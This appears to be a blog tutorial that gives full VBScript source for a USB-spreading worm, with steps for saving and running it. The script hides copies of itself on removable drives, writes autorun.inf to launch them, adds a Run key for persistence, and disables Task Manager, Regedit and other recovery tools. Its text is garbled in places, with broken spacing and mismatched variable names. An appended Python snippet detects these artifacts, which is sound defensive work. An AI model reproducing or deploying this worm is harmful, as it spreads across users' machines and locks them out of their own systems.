Every virus has its own characteristics, which can be distinguished by the way it attacks or by its file extension. This time
I will discuss a virus with the VBS extension that uses Windows Script
Host. The script can be created with a simple application, namely
Notepad. Here is how it is made:
1. Open Notepad
2. Copy and paste the following script:
-------------------------------------------------------Script----------------------------------------------------
on error resume next
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,Hx,nt,che ck,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe
k4l0n6.dll.vbs” set fs = createobject(”Scripting.FileSystemObject”) set
mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size
check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while
not text.atendofstream rekur = rekur & text.readline rekur = rekur
& vbcrlf loop do
Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath
& “\batch- k4l0n6.dll.vbs “) tf.attributes = 32 set
tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch-
k4l0n6.dll.vbs “) tf.attributes = 39
for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or
flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes
=32 set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs
“,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path
&”\k4l0n6.dll.vbs “) tf.attributes = 39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes =
32 set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi tf.close set tf = fs.getfile(flashdrive.path
&”\autorun.inf”) tf.attributes=39 end if next
set Hx = createobject(”WScript.Shell”)
Hx.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” HxHacker “
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
entVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” Hx.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
entVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
entVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” Hx.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
entVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
entVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
entVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
Hx.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
rentVersion\Winlogon\LegalNoticeCaption”, “Worm Hx . your computer now
is hacked by zeke hack.”
Hx.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
rentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
Hx.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOrganization”, “The Batrix” Hx.regwrite
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOwner”,”Hx ”
if check <> 1 then Wscript.sleep 200000 end if loop while check
<> 1 set sd = createobject(”Wscript.shell”) sd.run windowpath
& “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
-----------------------------------------------end of script---------------------------------------------------
3. Save As, change "Save as type" to "All Files", and save with the ".vbs" format, for example Hx.vbs.
____________________________________________________________________
--------------------------Use the Tutorial Wisely---------------------------
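A defender's view of the artifacts the script above leaves behind, as an added example that is not part of the original post: it flags `autorun.inf` entries that launch a script through Windows Script Host and lists the recovery-tool lockout policies that are switched on in a registry snapshot. The function names and both sample inputs are constructed for illustration; the snapshot is assumed to be a plain name-to-data mapping exported from the `Policies\Explorer` and `Policies\System` keys.

```python
import re

# Interpreters and script extensions that should never be launched from a
# removable drive's autorun.inf.
HOST_RE = re.compile(r'(?:^|[\\\s"])(wscript|cscript|mshta|cmd|powershell)(?:\.exe)?(?=[\s"]|$)')
SCRIPT_RE = re.compile(r'\.(vbs|vbe|js|jse|wsf|bat|cmd)(?=[\s"]|$)')
LAUNCH_KEYS = ("open", "shellexecute")

# Policy values the script on this page sets to block the user's recovery tools.
LOCKOUT_VALUES = {"DisableTaskMgr", "DisableRegistryTools", "NoRun", "NoFind",
                  "NoFolderOptions", "NoViewContextMenu"}


def audit_autorun(text):
    """Return (key, command) pairs in the [autorun] section that start a script."""
    findings, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if not in_section or "=" not in line:
            continue
        key, cmd = (part.strip() for part in line.split("=", 1))
        is_launch = key.lower() in LAUNCH_KEYS or key.lower().startswith("shell\\")
        if is_launch and (HOST_RE.search(cmd.lower()) or SCRIPT_RE.search(cmd.lower())):
            findings.append((key, cmd))
    return findings


def audit_policies(values):
    """Return the lockout policy names that are enabled in a {name: data} snapshot."""
    return sorted(name for name, data in values.items()
                  if name in LOCKOUT_VALUES and str(data).strip() not in ("", "0"))


# Constructed samples: the autorun.inf content matches what the script writes;
# the policy snapshot is invented for the demonstration.
SAMPLE_AUTORUN = "[autorun]\r\nshellexecute=wscript.exe k4l0n6.dll.vbs\r\n"
SAMPLE_POLICIES = {"DisableTaskMgr": 1, "NoRun": "1", "NoFind": 0, "NoDriveTypeAutoRun": 255}

if __name__ == "__main__":
    print(audit_autorun(SAMPLE_AUTORUN))
    print(audit_policies(SAMPLE_POLICIES))
```

Any hit from `audit_autorun` on a removable drive, or any name returned by `audit_policies` on a machine where no administrator set those policies, is worth investigating together with the `Run` key entry the script creates.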
1 comment:
Message: Do not use this to prank people, so use knowledge wisely